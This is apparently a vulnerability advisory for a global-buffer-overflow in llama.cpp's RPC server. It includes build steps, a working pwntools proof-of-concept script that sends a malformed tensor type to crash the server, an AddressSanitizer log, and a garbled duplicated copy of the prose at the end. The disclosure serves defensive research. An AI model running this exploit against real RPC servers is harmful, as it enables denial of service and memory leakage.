global-buffer-overflow in ggml_type_size
Summary
The unsafe type
member in the rpc_tensor
structure can cause global-buffer-overflow
.
Details
First, note that the type
membe in the rpc_tensor
structure can be controlled by the user.。
// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
uint64_t id;
uint32_t type;
uint64_t buffer;
uint32_t ne[GGML_MAX_DIMS];
uint32_t nb[GGML_MAX_DIMS];
uint32_t op;
int32_t op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
int32_t flags;
uint64_t src[GGML_MAX_SRC];
uint64_t view_src;
uint64_t view_offs;
uint64_t data;
char name[GGML_MAX_NAME];
char padding[4];
};
#pragma pack(pop)
We can achieve global-buffer-overflow
during the following call by controlling the value of the type
.
The following is the function call chain that leads to global-buffer-overflow:
-
start_rpc_sercer
- rpc_serve_client
- rpc_server::get_tensor
- rpc_server::deserialize_tensor
GGML_CALL size_t ggml_type_size(enum ggml_type type) {
return type_traits[type].type_size; //The type value is not properly validated or sanitized.
}
PoC
Build
git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && mkdir build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwn
Reproduce
In llama/llama.cpp/build-rpc/bin
,Run this command:
Then run the following Python script
, I set type to 0x100.
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64',log_level = 'debug')
p = remote("127.0.0.1",50052)
pd = b''
rpc_tensor_pd = flat(
{
0: [
0x1, # id
p32(0x100), # type
p64(0xdeadbeef), # buffer
[ # ne
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
],
[ # nb
p32(1),
p32(1),
p32(1),
p32(1),
],
p32(0), # op
[p32(0)] * 16, # op_params (corrected from 8 to 16)
p32(0), # flags
[p64(0)] * 10, # src
p64(0), # view_src
p64(0), # view_offs
p64(0xdeadbeef), # data
'a' * 64, # name
'x' * 4 # padding
],
}
)
cmd = p8(GET_TENSOR)
content = flat(
{
0: rpc_tensor_pd + p64(0) + p64(0x100)
}
)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
p.recvall(timeout=1)
p.close()
It will be global-buffer-overflow
.
Asan log
➜ bin git:(master) ✗ ./rpc-server -p 50052
create_backend: using CPU backend
Starting RPC server on 0.0.0.0:50052, backend memory: 7896 MB
Accepted client connection, free_mem=8280244224, total_mem=8280244224
=================================================================
==14276==ERROR: AddressSanitizer: global-buffer-overflow on address 0x738b419e94d8 at pc 0x738b4183cad9 bp 0x7fffe4a5ac50 sp 0x7fffe4a5ac40
READ of size 8 at 0x738b419e94d8 thread T0
#0 0x738b4183cad8 in ggml_type_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8)
#1 0x738b418467b5 in ggml_row_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x467b5)
#2 0x738b41863fdd in ggml_new_tensor (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x63fdd)
#3 0x738b41864a2b in ggml_new_tensor_4d (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x64a2b)
#4 0x738b41944ee6 in rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x144ee6)
#5 0x738b41949f1f in rpc_server::get_tensor(std::vector<unsigned char, std::allocator<unsigned char> > const&, std::vector<unsigned char, std::allocator<unsigned char> >&) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x149f1f)
#6 0x738b41957642 in start_rpc_server (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x157642)
#7 0x5c8d5aeeec63 in main (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2c63)
#8 0x738b41029d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#9 0x738b41029e3f in __libc_start_main_impl ../csu/libc-start.c:392
#10 0x5c8d5aeeeff4 in _start (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2ff4)
Address 0x738b419e94d8 is a wild pointer.
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8) in ggml_type_size
Shadow bytes around the buggy address:
0x0e71e8335240: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335250: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335260: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335270: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335280: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0e71e8335290: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9
0x0e71e83352a0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352e0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==14276==ABORTING
Impact
This vulnerability may lead to memory data leakage
Credit
This vulnerability was discovered by 7resp4ss
and Guang Gong
from 360 Vulnerability Research Institute
.
global-buffer-overflow in ggml_type_size
Summary
The unsafe
type
member in therpc_tensor
structure can causeglobal-buffer-overflow
.Details
First, note that the
type
membe in therpc_tensor
structure can be controlled by the user.。We can achieve
global-buffer-overflow
during the following call by controlling the value of thetype
.The following is the function call chain that leads to global-buffer-overflow:
start_rpc_sercer
PoC
Build
Reproduce
In
llama/llama.cpp/build-rpc/bin
,Run this command:Then run the following
Python script
, I set type to 0x100.It will be
global-buffer-overflow
.Asan log
Impact
This vulnerability may lead to memory data leakage
Credit
This vulnerability was discovered by
7resp4ss
andGuang Gong
from360 Vulnerability Research Institute
.